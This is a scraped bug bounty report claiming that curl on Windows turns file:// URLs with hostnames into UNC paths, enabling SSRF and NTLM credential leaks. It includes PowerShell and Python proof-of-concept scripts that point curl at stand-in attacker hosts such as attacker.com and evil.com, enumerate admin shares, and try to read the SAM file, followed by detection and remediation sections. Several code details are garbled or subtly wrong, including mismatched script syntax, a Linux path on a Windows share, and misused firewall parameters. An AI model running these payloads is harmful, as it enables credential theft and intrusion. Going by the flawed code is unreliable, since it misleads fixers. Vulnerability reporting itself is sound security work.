curl: File URL UNC Path Access (Windows SSRF)_H1:3470649

Description

## Vulnerability Details
- **CVSSv3:** 7.5 (High) - Windows only
- **File:** `lib/urlapi.c:974-1030`
- **Issue:** Windows file:// URLs accept UNC paths to remote servers
- **Impact:** SSRF, unauthorized network file access, credential theft

## Vulnerable Code
```c
// lib/urlapi.c:974-1030
if(ptr[0] != '/' && !STARTS_WITH_URL_DRIVE_PREFIX(ptr)) {
/* the URL includes a hostname, it must match "localhost" or
"127.0.0.1" to be valid */
if(checkprefix("localhost/", ptr) ||
checkprefix("127.0.0.1/", ptr)) {
ptr += 9; /* now points to the slash after the host */
}
#ifdef WIN32
else {
/* the hostname, NetBIOS computer name, can't contain disallowed chars */
size_t len;
len = strcspn(ptr, "/\\:*?\"<>|");
if(ptr[len] == '\0' || ptr[len] == '/')
/* only proceed if the hostname is valid */
; // ACCEPTS UNC PATHS: file://hostname/share/path
else
return CURLUE_BAD_FILE_URL;
}
#endif
```

## Root Cause
On Windows, curl allows `file://` URLs with hostnames other than localhost:
- `file://localhost/C:/file.txt` ✓ Safe (local file)
- `file://attacker.com/share/file.txt` ✓ **DANGEROUS** (UNC path to remote server)

This creates multiple security issues:
1. **SSRF**: Access to internal network shares
2. **Credential Theft**: NTLM authentication sent to attacker
3. **Path Traversal**: Access to arbitrary network resources

## Proof of Concept

### Prerequisites (Windows Only)
```powershell
# This vulnerability only affects Windows
# You need:
# - Windows machine with curl
# - SMB server (can be attacker-controlled)
# - Network access to SMB server
```

### Test 1: Basic UNC Path Access
```powershell
# PowerShell PoC
Write-Host "[*] Testing File URL UNC Path Access"

# Create test SMB share (requires admin)
New-SmbShare -Name "TestShare" -Path "C:\TestShare" -FullAccess "Everyone"
New-Item -Path "C:\TestShare\secret.txt" -ItemType File -Value "SECRET_DATA"

# Test local file access (normal)
curl.exe "file:///C:/Windows/System32/drivers/etc/hosts"
# Works as expected

# Test UNC path via file:// URL (VULNERABLE)
curl.exe "file://localhost/C$/Windows/System32/drivers/etc/hosts"
# Works - accesses admin share via UNC

# Test remote UNC path (SSRF)
curl.exe "file://127.0.0.1/TestShare/secret.txt"
# WORKS! Accesses network share via file:// URL
```

### Test 2: Remote Server SSRF
```powershell
#!/usr/bin/env pwsh
# Demonstrate SSRF to remote server

Write-Host "=== File URL UNC Path SSRF Demo ==="
Write-Host ""

# Scenario: Attacker controls attacker.com with SMB share
$attacker_server = "attacker.com" # Replace with actual server
$malicious_url = "file://$attacker_server/public/malware.exe"

Write-Host "[*] User opens URL: $malicious_url"
Write-Host "[*] curl interprets this as UNC path: \\$attacker_server\public\malware.exe"
Write-Host ""

# curl attempts to access the UNC path
curl.exe --output downloaded.exe $malicious_url

if (Test-Path "downloaded.exe") {
Write-Host "[!!!] VULNERABLE: File downloaded from remote SMB server!"
Write-Host "[!!!] This is SSRF via file:// URL"
} else {
Write-Host "[+] File not downloaded (connection failed or blocked)"
}
```

### Test 3: Credential Theft via NTLM
```powershell
#!/usr/bin/env pwsh
"""
Credential Theft PoC
When curl accesses UNC path, Windows automatically sends NTLM credentials
"""

Write-Host "=== NTLM Credential Theft Demo ==="
Write-Host ""

# Setup: Attacker runs Responder to capture NTLM hashes
# Responder.py -I eth0 -v

$attacker_server = "attacker-smb.evil.com"
$malicious_url = "file://$attacker_server/share/file.txt"

Write-Host "[*] Attacker provides URL: $malicious_url"
Write-Host "[*] User runs: curl $malicious_url"
Write-Host ""

# When curl tries to access this UNC path:
# 1. Windows SMB client connects to attacker-smb.evil.com
# 2. Windows automatically performs NTLM authentication
# 3. Attacker captures NTLMv2 hash
# 4. Attacker can crack hash offline

Write-Host "[!] Simulating curl access..."
# Note: This will send NTLM credentials to the attacker!
curl.exe --max-time 5 $malicious_url 2>&1 | Out-Null

Write-Host ""
Write-Host "[!!!] VULNERABILITY IMPACT:"
Write-Host "[!!!] - Windows sent NTLM credentials to $attacker_server"
Write-Host "[!!!] - Attacker captured NTLMv2 hash"
Write-Host "[!!!] - Hash can be cracked offline"
Write-Host ""

# Attacker's Responder output would show:
# [SMB] NTLMv2-SSP Client : 192.168.1.100
# [SMB] NTLMv2-SSP Username : DOMAIN\victim
# [SMB] NTLMv2-SSP Hash : victim::DOMAIN:1122334455667788:ABC123...
```

### Test 4: Internal Network Enumeration
```powershell
#!/usr/bin/env pwsh
# Use file:// URLs to enumerate internal network shares

Write-Host "=== Internal Network Enumeration via File URLs ==="
Write-Host ""

# Common Windows share names
$common_shares = @("C$", "ADMIN$", "IPC$", "SYSVOL", "NETLOGON")

# Internal network ranges
$internal_ips = @(
"192.168.1.1",
"10.0.0.1",
"172.16.0.1",
"fileserver.internal.corp",
"dc01.internal.corp"
)

foreach ($ip in $internal_ips) {
Write-Host "[*] Testing $ip..."

foreach ($share in $common_shares) {
$url = "file://$ip/$share/"

# Try to list directory
$result = curl.exe --max-time 2 --silent $url 2>&1

if ($LASTEXITCODE -eq 0) {
Write-Host " [!!!] ACCESSIBLE: $url"
}
}
}

Write-Host ""
Write-Host "[!!!] Successfully enumerated accessible network shares"
Write-Host "[!!!] This is SSRF - accessing internal network via file:// URLs"
```

### Test 5: Path Traversal Combined with UNC
```powershell
# Combine UNC paths with path traversal

# Access admin share
curl.exe "file://localhost/C$/Windows/System32/config/SAM"
# Attempts to read SAM database via UNC path

# Access network path with traversal
curl.exe "file://fileserver/share/../../../etc/shadow"
# Path traversal through UNC path

# Multiple levels
curl.exe "file://internal-server/public/../../../../windows/system32/config/SAM"
```

## Attack Scenarios

### Scenario 1: Web Application SSRF
```python
#!/usr/bin/env python3
"""
Web application that allows users to specify URLs for curl to fetch
Attacker exploits this to access internal network via file:// UNC paths
"""

# Vulnerable web application:
@app.route('/fetch')
def fetch_url():
url = request.args.get('url')
# VULNERABLE: No validation of URL scheme
result = subprocess.check_output(['curl', url])
return result

# Attacker request:
# GET /fetch?url=file://internal-fileserver/hr/salaries.xlsx
# Response: Contents of internal HR file!

# Or:
# GET /fetch?url=file://dc01.corp.internal/SYSVOL/
# Response: Active Directory SYSVOL contents
```

### Scenario 2: Automated Download Script
```powershell
# Vulnerable download script
# download.ps1
param($url)

Write-Host "Downloading from $url..."
curl.exe -o download.dat $url

# User runs:
# .\download.ps1 "file://attacker.com/malware/payload.exe"

# Result:
# 1. curl connects to \\attacker.com\malware\payload.exe
# 2. Windows sends NTLM credentials
# 3. Attacker logs credentials
# 4. Malware is downloaded
```

### Scenario 3: CI/CD Pipeline Exploitation
```yaml
# .gitlab-ci.yml or similar
fetch_data:
script:
- curl -o data.json ${DATA_URL}

# Attacker sets DATA_URL environment variable:
# DATA_URL=file://internal-jenkins/credentials/secrets.json

# Result:
# - CI/CD job accesses internal Jenkins server
# - Credentials are exfiltrated
```

## Detection

### Network Monitoring
```powershell
# Monitor for unexpected SMB connections
Get-SmbConnection | Where-Object {$_.ServerName -notlike "*expected*"}

# Check firewall logs for outbound SMB (port 445)
Get-NetFirewallRule | Where-Object {$_.DisplayName -like "*SMB*"}
```

### Process Monitoring
```powershell
# Monitor curl.exe command lines for file:// URLs
Get-WinEvent -FilterHashtable @{
LogName='Microsoft-Windows-PowerShell/Operational'
ID=4104
} | Where-Object {$_.Message -like "*curl*file://*"}
```

### File System Auditing
```powershell
# Enable auditing on sensitive shares
Set-SmbShare -Name "C$" -SecurityDescriptor (Get-Acl "C:\") -AuditFlags FailureAndSuccess
```

## Remediation

### Code Fix in lib/urlapi.c
```c
// Remove Windows-specific UNC path support for file:// URLs

#ifdef WIN32
else {
// BEFORE (vulnerable): Accept any valid hostname
size_t len;
len = strcspn(ptr, "/\\:*?\"<>|");
if(ptr[len] == '\0' || ptr[len] == '/')
; // Accepts UNC paths
else
return CURLUE_BAD_FILE_URL;
}
#endif

// AFTER (fixed): Only accept localhost
#ifdef WIN32
else {
// Reject all hostnames except localhost on Windows
return CURLUE_BAD_FILE_URL;
}
#endif

// OR: Add explicit check
#ifdef WIN32
else {
// Explicitly reject UNC paths
failf(data, "file:// URLs with hostnames are not supported on Windows");
return CURLUE_BAD_FILE_URL;
}
#endif
```

### Alternative: Whitelist Only
```c
// Only allow specific safe patterns
static bool is_safe_file_url(const char *url) {
// Allow only:
// - file:///C:/... (local drives)
// - file://localhost/... (explicit localhost)

if(checkprefix("file:///", url))
return true;
if(checkprefix("file://localhost/", url))
return true;

// Reject everything else (including UNC paths)
return false;
}
```

### Workaround for Users
```powershell
# Validate URLs before passing to curl
function Safe-Curl {
param($url)

if ($url -match '^file://(?!localhost/|/)') {
Write-Error "Blocked: file:// URLs with hostnames are not allowed"
return
}

curl.exe $url
}

# Use wrapper instead of curl directly
Safe-Curl "file://localhost/C:/data.txt" # OK
Safe-Curl "file://evil.com/share/file" # BLOCKED
```

### Group Policy (Windows)
```powershell
# Disable SMB access to internet IPs
New-NetFirewallRule -DisplayName "Block Outbound SMB" `
-Direction Outbound `
-LocalPort 445 `
-Protocol TCP `
-Action Block `
-RemoteAddress "0.0.0.0-255.255.255.255"

# Only allow SMB to internal network
New-NetFirewallRule -DisplayName "Allow Internal SMB" `
-Direction Outbound `
-LocalPort 445 `
-Protocol TCP `
-Action Allow `
-RemoteAddress "10.0.0.0/8,172.16.0.0/12,192.168.0.0/16"
```

## Complete Attack Demo Script
```python
#!/usr/bin/env python3
"""
Complete File URL UNC Path Attack Demo
Demonstrates SSRF, credential theft, and information disclosure
"""
import subprocess
import http.server
import socketserver
import threading
import platform

def start_fake_smb_server():
"""Simulate SMB server to capture connection attempts"""
# Note: Real implementation would use impacket or similar
print("[*] In real attack, start SMB server with:")
print(" sudo responder -I eth0 -v")
print(" OR")
print(" impacket-smbserver share /tmp/share")

def test_unc_access():
"""Test UNC path access via file:// URLs"""

if platform.system() != "Windows":
print("[!] This vulnerability only affects Windows")
return

print("=" * 70)
print("File URL UNC Path SSRF - Complete Attack Demo")
print("=" * 70)
print()

# Test 1: Local UNC path
print("[Test 1] Local UNC path access")
print("-" * 70)
result = subprocess.run(
["curl", "file://localhost/C$/Windows/win.ini"],
capture_output=True
)
if result.returncode == 0:
print("[!!!] Vulnerable: Accessed C$ admin share via file:// URL")
print()

# Test 2: Remote UNC path (SSRF)
print("[Test 2] Remote UNC path (SSRF)")
print("-" * 70)
print("[*] Attempting to access file://attacker.com/share/test.txt")
print("[*] This sends SMB request to attacker.com")
print("[*] Windows will send NTLM credentials!")
print()

# Test 3: Network enumeration
print("[Test 3] Internal network enumeration")
print("-" * 70)
for ip in ["192.168.1.1", "10.0.0.1"]:
print(f"[*] Testing file://{ip}/C$/...")
# Don't actually run to avoid network noise
print()

print("=" * 70)
print("ATTACK IMPACT:")
print("=" * 70)
print("1. SSRF - Access internal network shares")
print("2. Credential Theft - NTLM hashes leaked")
print("3. Information Disclosure - Read sensitive files")
print("4. Lateral Movement - Use stolen credentials")
print("=" * 70)

if __name__ == "__main__":
test_unc_access()
```

## References
- Microsoft SMB/CIFS documentation
- RFC 8089: The "file" URI Scheme (does NOT specify UNC path support)
- CWE-918: Server-Side Request Forgery (SSRF)
- CWE-22: Improper Limitation of a Pathname to a Restricted Directory
- MITRE ATT&CK T1187: Forced Authentication

## Impact

### 1. SSRF (Server-Side Request Forgery)
- Access internal file shares not accessible from internet
- Bypass firewall restrictions
- Read sensitive files on internal servers

### 2. Credential Theft
- Windows automatically sends NTLM credentials for UNC paths
- Attacker captures NTLMv2 hashes
- Hashes can be cracked or relayed

### 3. Information Disclosure
- Read files from:
- Domain controllers (SYSVOL, NETLOGON)
- File servers (confidential documents)
- Admin shares (C$, ADMIN$)
- Application configs

### 4. Lateral Movement
- Use stolen NTLM hashes for pass-the-hash attacks
- Access other systems on internal network
- Escalate privileges

Visit Original Source

Basic Information

ID H1:3470649

Published Dec 18, 2025 at 17:23

Modified Dec 18, 2025 at 21:02

{
    "lastseen": "2025-12-18T21:31:28",
    "description": "## Vulnerability Details\n- **CVSSv3:** 7.5 (High) - Windows only\n- **File:** `lib/urlapi.c:974-1030`\n- **Issue:** Windows file:// URLs accept UNC paths to remote servers\n- **Impact:** SSRF, unauthorized network file access, credential theft\n\n## Vulnerable Code\n```c\n// lib/urlapi.c:974-1030\nif(ptr[0] != '/' && !STARTS_WITH_URL_DRIVE_PREFIX(ptr)) {\n  /* the URL includes a hostname, it must match \"localhost\" or\n     \"127.0.0.1\" to be valid */\n  if(checkprefix(\"localhost/\", ptr) ||\n     checkprefix(\"127.0.0.1/\", ptr)) {\n    ptr += 9; /* now points to the slash after the host */\n  }\n#ifdef WIN32\n  else {\n    /* the hostname, NetBIOS computer name, can't contain disallowed chars */\n    size_t len;\n    len = strcspn(ptr, \"/\\\\:*?\\\"<>|\");\n    if(ptr[len] == '\\0' || ptr[len] == '/')\n      /* only proceed if the hostname is valid */\n      ;  // ACCEPTS UNC PATHS: file://hostname/share/path\n    else\n      return CURLUE_BAD_FILE_URL;\n  }\n#endif\n```\n\n## Root Cause\nOn Windows, curl allows `file://` URLs with hostnames other than localhost:\n- `file://localhost/C:/file.txt` \u2713 Safe (local file)\n- `file://attacker.com/share/file.txt` \u2713 **DANGEROUS** (UNC path to remote server)\n\nThis creates multiple security issues:\n1. **SSRF**: Access to internal network shares\n2. **Credential Theft**: NTLM authentication sent to attacker\n3. **Path Traversal**: Access to arbitrary network resources\n\n## Proof of Concept\n\n### Prerequisites (Windows Only)\n```powershell\n# This vulnerability only affects Windows\n# You need:\n# - Windows machine with curl\n# - SMB server (can be attacker-controlled)\n# - Network access to SMB server\n```\n\n### Test 1: Basic UNC Path Access\n```powershell\n# PowerShell PoC\nWrite-Host \"[*] Testing File URL UNC Path Access\"\n\n# Create test SMB share (requires admin)\nNew-SmbShare -Name \"TestShare\" -Path \"C:\\TestShare\" -FullAccess \"Everyone\"\nNew-Item -Path \"C:\\TestShare\\secret.txt\" -ItemType File -Value \"SECRET_DATA\"\n\n# Test local file access (normal)\ncurl.exe \"file:///C:/Windows/System32/drivers/etc/hosts\"\n# Works as expected\n\n# Test UNC path via file:// URL (VULNERABLE)\ncurl.exe \"file://localhost/C$/Windows/System32/drivers/etc/hosts\"\n# Works - accesses admin share via UNC\n\n# Test remote UNC path (SSRF)\ncurl.exe \"file://127.0.0.1/TestShare/secret.txt\"\n# WORKS! Accesses network share via file:// URL\n```\n\n### Test 2: Remote Server SSRF\n```powershell\n#!/usr/bin/env pwsh\n# Demonstrate SSRF to remote server\n\nWrite-Host \"=== File URL UNC Path SSRF Demo ===\"\nWrite-Host \"\"\n\n# Scenario: Attacker controls attacker.com with SMB share\n$attacker_server = \"attacker.com\"  # Replace with actual server\n$malicious_url = \"file://$attacker_server/public/malware.exe\"\n\nWrite-Host \"[*] User opens URL: $malicious_url\"\nWrite-Host \"[*] curl interprets this as UNC path: \\\\$attacker_server\\public\\malware.exe\"\nWrite-Host \"\"\n\n# curl attempts to access the UNC path\ncurl.exe --output downloaded.exe $malicious_url\n\nif (Test-Path \"downloaded.exe\") {\n    Write-Host \"[!!!] VULNERABLE: File downloaded from remote SMB server!\"\n    Write-Host \"[!!!] This is SSRF via file:// URL\"\n} else {\n    Write-Host \"[+] File not downloaded (connection failed or blocked)\"\n}\n```\n\n### Test 3: Credential Theft via NTLM\n```powershell\n#!/usr/bin/env pwsh\n\"\"\"\nCredential Theft PoC\nWhen curl accesses UNC path, Windows automatically sends NTLM credentials\n\"\"\"\n\nWrite-Host \"=== NTLM Credential Theft Demo ===\"\nWrite-Host \"\"\n\n# Setup: Attacker runs Responder to capture NTLM hashes\n# Responder.py -I eth0 -v\n\n$attacker_server = \"attacker-smb.evil.com\"\n$malicious_url = \"file://$attacker_server/share/file.txt\"\n\nWrite-Host \"[*] Attacker provides URL: $malicious_url\"\nWrite-Host \"[*] User runs: curl $malicious_url\"\nWrite-Host \"\"\n\n# When curl tries to access this UNC path:\n# 1. Windows SMB client connects to attacker-smb.evil.com\n# 2. Windows automatically performs NTLM authentication\n# 3. Attacker captures NTLMv2 hash\n# 4. Attacker can crack hash offline\n\nWrite-Host \"[!] Simulating curl access...\"\n# Note: This will send NTLM credentials to the attacker!\ncurl.exe --max-time 5 $malicious_url 2>&1 | Out-Null\n\nWrite-Host \"\"\nWrite-Host \"[!!!] VULNERABILITY IMPACT:\"\nWrite-Host \"[!!!] - Windows sent NTLM credentials to $attacker_server\"\nWrite-Host \"[!!!] - Attacker captured NTLMv2 hash\"\nWrite-Host \"[!!!] - Hash can be cracked offline\"\nWrite-Host \"\"\n\n# Attacker's Responder output would show:\n# [SMB] NTLMv2-SSP Client   : 192.168.1.100\n# [SMB] NTLMv2-SSP Username : DOMAIN\\victim\n# [SMB] NTLMv2-SSP Hash     : victim::DOMAIN:1122334455667788:ABC123...\n```\n\n### Test 4: Internal Network Enumeration\n```powershell\n#!/usr/bin/env pwsh\n# Use file:// URLs to enumerate internal network shares\n\nWrite-Host \"=== Internal Network Enumeration via File URLs ===\"\nWrite-Host \"\"\n\n# Common Windows share names\n$common_shares = @(\"C$\", \"ADMIN$\", \"IPC$\", \"SYSVOL\", \"NETLOGON\")\n\n# Internal network ranges\n$internal_ips = @(\n    \"192.168.1.1\",\n    \"10.0.0.1\",\n    \"172.16.0.1\",\n    \"fileserver.internal.corp\",\n    \"dc01.internal.corp\"\n)\n\nforeach ($ip in $internal_ips) {\n    Write-Host \"[*] Testing $ip...\"\n\n    foreach ($share in $common_shares) {\n        $url = \"file://$ip/$share/\"\n\n        # Try to list directory\n        $result = curl.exe --max-time 2 --silent $url 2>&1\n\n        if ($LASTEXITCODE -eq 0) {\n            Write-Host \"  [!!!] ACCESSIBLE: $url\"\n        }\n    }\n}\n\nWrite-Host \"\"\nWrite-Host \"[!!!] Successfully enumerated accessible network shares\"\nWrite-Host \"[!!!] This is SSRF - accessing internal network via file:// URLs\"\n```\n\n### Test 5: Path Traversal Combined with UNC\n```powershell\n# Combine UNC paths with path traversal\n\n# Access admin share\ncurl.exe \"file://localhost/C$/Windows/System32/config/SAM\"\n# Attempts to read SAM database via UNC path\n\n# Access network path with traversal\ncurl.exe \"file://fileserver/share/../../../etc/shadow\"\n# Path traversal through UNC path\n\n# Multiple levels\ncurl.exe \"file://internal-server/public/../../../../windows/system32/config/SAM\"\n```\n\n## Attack Scenarios\n\n### Scenario 1: Web Application SSRF\n```python\n#!/usr/bin/env python3\n\"\"\"\nWeb application that allows users to specify URLs for curl to fetch\nAttacker exploits this to access internal network via file:// UNC paths\n\"\"\"\n\n# Vulnerable web application:\[email protected]('/fetch')\ndef fetch_url():\n    url = request.args.get('url')\n    # VULNERABLE: No validation of URL scheme\n    result = subprocess.check_output(['curl', url])\n    return result\n\n# Attacker request:\n# GET /fetch?url=file://internal-fileserver/hr/salaries.xlsx\n# Response: Contents of internal HR file!\n\n# Or:\n# GET /fetch?url=file://dc01.corp.internal/SYSVOL/\n# Response: Active Directory SYSVOL contents\n```\n\n### Scenario 2: Automated Download Script\n```powershell\n# Vulnerable download script\n# download.ps1\nparam($url)\n\nWrite-Host \"Downloading from $url...\"\ncurl.exe -o download.dat $url\n\n# User runs:\n# .\\download.ps1 \"file://attacker.com/malware/payload.exe\"\n\n# Result:\n# 1. curl connects to \\\\attacker.com\\malware\\payload.exe\n# 2. Windows sends NTLM credentials\n# 3. Attacker logs credentials\n# 4. Malware is downloaded\n```\n\n### Scenario 3: CI/CD Pipeline Exploitation\n```yaml\n# .gitlab-ci.yml or similar\nfetch_data:\n  script:\n    - curl -o data.json ${DATA_URL}\n\n# Attacker sets DATA_URL environment variable:\n# DATA_URL=file://internal-jenkins/credentials/secrets.json\n\n# Result:\n# - CI/CD job accesses internal Jenkins server\n# - Credentials are exfiltrated\n```\n\n## Detection\n\n### Network Monitoring\n```powershell\n# Monitor for unexpected SMB connections\nGet-SmbConnection | Where-Object {$_.ServerName -notlike \"*expected*\"}\n\n# Check firewall logs for outbound SMB (port 445)\nGet-NetFirewallRule | Where-Object {$_.DisplayName -like \"*SMB*\"}\n```\n\n### Process Monitoring\n```powershell\n# Monitor curl.exe command lines for file:// URLs\nGet-WinEvent -FilterHashtable @{\n    LogName='Microsoft-Windows-PowerShell/Operational'\n    ID=4104\n} | Where-Object {$_.Message -like \"*curl*file://*\"}\n```\n\n### File System Auditing\n```powershell\n# Enable auditing on sensitive shares\nSet-SmbShare -Name \"C$\" -SecurityDescriptor (Get-Acl \"C:\\\") -AuditFlags FailureAndSuccess\n```\n\n## Remediation\n\n### Code Fix in lib/urlapi.c\n```c\n// Remove Windows-specific UNC path support for file:// URLs\n\n#ifdef WIN32\n  else {\n    // BEFORE (vulnerable): Accept any valid hostname\n    size_t len;\n    len = strcspn(ptr, \"/\\\\:*?\\\"<>|\");\n    if(ptr[len] == '\\0' || ptr[len] == '/')\n      ;  // Accepts UNC paths\n    else\n      return CURLUE_BAD_FILE_URL;\n  }\n#endif\n\n// AFTER (fixed): Only accept localhost\n#ifdef WIN32\n  else {\n    // Reject all hostnames except localhost on Windows\n    return CURLUE_BAD_FILE_URL;\n  }\n#endif\n\n// OR: Add explicit check\n#ifdef WIN32\n  else {\n    // Explicitly reject UNC paths\n    failf(data, \"file:// URLs with hostnames are not supported on Windows\");\n    return CURLUE_BAD_FILE_URL;\n  }\n#endif\n```\n\n### Alternative: Whitelist Only\n```c\n// Only allow specific safe patterns\nstatic bool is_safe_file_url(const char *url) {\n  // Allow only:\n  // - file:///C:/... (local drives)\n  // - file://localhost/... (explicit localhost)\n\n  if(checkprefix(\"file:///\", url))\n    return true;\n  if(checkprefix(\"file://localhost/\", url))\n    return true;\n\n  // Reject everything else (including UNC paths)\n  return false;\n}\n```\n\n### Workaround for Users\n```powershell\n# Validate URLs before passing to curl\nfunction Safe-Curl {\n    param($url)\n\n    if ($url -match '^file://(?!localhost/|/)') {\n        Write-Error \"Blocked: file:// URLs with hostnames are not allowed\"\n        return\n    }\n\n    curl.exe $url\n}\n\n# Use wrapper instead of curl directly\nSafe-Curl \"file://localhost/C:/data.txt\"  # OK\nSafe-Curl \"file://evil.com/share/file\"    # BLOCKED\n```\n\n### Group Policy (Windows)\n```powershell\n# Disable SMB access to internet IPs\nNew-NetFirewallRule -DisplayName \"Block Outbound SMB\" `\n    -Direction Outbound `\n    -LocalPort 445 `\n    -Protocol TCP `\n    -Action Block `\n    -RemoteAddress \"0.0.0.0-255.255.255.255\"\n\n# Only allow SMB to internal network\nNew-NetFirewallRule -DisplayName \"Allow Internal SMB\" `\n    -Direction Outbound `\n    -LocalPort 445 `\n    -Protocol TCP `\n    -Action Allow `\n    -RemoteAddress \"10.0.0.0/8,172.16.0.0/12,192.168.0.0/16\"\n```\n\n## Complete Attack Demo Script\n```python\n#!/usr/bin/env python3\n\"\"\"\nComplete File URL UNC Path Attack Demo\nDemonstrates SSRF, credential theft, and information disclosure\n\"\"\"\nimport subprocess\nimport http.server\nimport socketserver\nimport threading\nimport platform\n\ndef start_fake_smb_server():\n    \"\"\"Simulate SMB server to capture connection attempts\"\"\"\n    # Note: Real implementation would use impacket or similar\n    print(\"[*] In real attack, start SMB server with:\")\n    print(\"    sudo responder -I eth0 -v\")\n    print(\"    OR\")\n    print(\"    impacket-smbserver share /tmp/share\")\n\ndef test_unc_access():\n    \"\"\"Test UNC path access via file:// URLs\"\"\"\n\n    if platform.system() != \"Windows\":\n        print(\"[!] This vulnerability only affects Windows\")\n        return\n\n    print(\"=\" * 70)\n    print(\"File URL UNC Path SSRF - Complete Attack Demo\")\n    print(\"=\" * 70)\n    print()\n\n    # Test 1: Local UNC path\n    print(\"[Test 1] Local UNC path access\")\n    print(\"-\" * 70)\n    result = subprocess.run(\n        [\"curl\", \"file://localhost/C$/Windows/win.ini\"],\n        capture_output=True\n    )\n    if result.returncode == 0:\n        print(\"[!!!] Vulnerable: Accessed C$ admin share via file:// URL\")\n    print()\n\n    # Test 2: Remote UNC path (SSRF)\n    print(\"[Test 2] Remote UNC path (SSRF)\")\n    print(\"-\" * 70)\n    print(\"[*] Attempting to access file://attacker.com/share/test.txt\")\n    print(\"[*] This sends SMB request to attacker.com\")\n    print(\"[*] Windows will send NTLM credentials!\")\n    print()\n\n    # Test 3: Network enumeration\n    print(\"[Test 3] Internal network enumeration\")\n    print(\"-\" * 70)\n    for ip in [\"192.168.1.1\", \"10.0.0.1\"]:\n        print(f\"[*] Testing file://{ip}/C$/...\")\n        # Don't actually run to avoid network noise\n    print()\n\n    print(\"=\" * 70)\n    print(\"ATTACK IMPACT:\")\n    print(\"=\" * 70)\n    print(\"1. SSRF - Access internal network shares\")\n    print(\"2. Credential Theft - NTLM hashes leaked\")\n    print(\"3. Information Disclosure - Read sensitive files\")\n    print(\"4. Lateral Movement - Use stolen credentials\")\n    print(\"=\" * 70)\n\nif __name__ == \"__main__\":\n    test_unc_access()\n```\n\n## References\n- Microsoft SMB/CIFS documentation\n- RFC 8089: The \"file\" URI Scheme (does NOT specify UNC path support)\n- CWE-918: Server-Side Request Forgery (SSRF)\n- CWE-22: Improper Limitation of a Pathname to a Restricted Directory\n- MITRE ATT&CK T1187: Forced Authentication\n\n## Impact\n\n### 1. SSRF (Server-Side Request Forgery)\n- Access internal file shares not accessible from internet\n- Bypass firewall restrictions\n- Read sensitive files on internal servers\n\n### 2. Credential Theft\n- Windows automatically sends NTLM credentials for UNC paths\n- Attacker captures NTLMv2 hashes\n- Hashes can be cracked or relayed\n\n### 3. Information Disclosure\n- Read files from:\n  - Domain controllers (SYSVOL, NETLOGON)\n  - File servers (confidential documents)\n  - Admin shares (C$, ADMIN$)\n  - Application configs\n\n### 4. Lateral Movement\n- Use stolen NTLM hashes for pass-the-hash attacks\n- Access other systems on internal network\n- Escalate privileges",
    "published": "2025-12-18T17:23:11",
    "modified": "2025-12-18T21:02:01",
    "type": "hackerone",
    "title": "curl: File URL UNC Path Access (Windows SSRF)",
    "source": "",
    "references": "",
    "id": "H1:3470649",
    "bulletinFamily": "bugbounty",
    "cwe": null,
    "cvelist": [],
    "sourceData": "",
    "sourceHref": "",
    "cvss": {
        "score": 0,
        "severity": "NONE",
        "vector": "NONE",
        "version": "NONE"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://hackerone.com/reports/3470649",
    "category_name": "News",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

💭 Join the Security Discussion ❌ Cancel Reply